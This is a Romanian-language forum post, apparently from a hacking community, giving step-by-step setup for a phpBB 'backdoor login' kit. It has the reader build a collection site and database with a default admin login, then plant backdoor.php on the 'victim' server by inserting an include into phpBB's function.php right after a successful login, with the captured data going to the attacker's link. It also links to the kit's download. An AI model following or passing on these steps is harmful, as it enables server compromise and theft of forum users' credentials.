Jump to content
Serar

PHPBB backdoor login

Recommended Posts

Posted

Instalare:

Pas1:

Este cam aceeasi treaba ca si la iStealer, ai nevoie de un subdomeniu, si o baza da date, in arhiva de download o sa gasiti un sql importati-l in baza de date, si uploadati pe server tot inafara de backdoor.php si fisierul sql(importat anterior). In index.php puneti-va datele bazei de date


$con=mysql_connect('localhost','root','') or die(mysql_error());
//selectam baza de date
mysql_select_db('back',$con) or die(mysql_error());

Pentru login default este Admin:admin

pozatt2.png

Pas2

fisierul backdoor.php trebuie uploadat pe serverul victima si inclus in includes/function.php insa inainte de asta mergeti la linia : $link='http://127.0.0.1/phpbackdoor'; si puneti-va linkul facut la pasul 1.

mergeti in function.php cautati


// The result parameter is always an array, holding the relevant information...
if ($result['status'] == LOGIN_SUCCESS)
{

si dupa "{" adaugati include '/cale/backdoor.php';

pozatt.png

Download:Get phpbackdoor.rar on Wupload.com

Si aici sa terminat, source : Aici

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...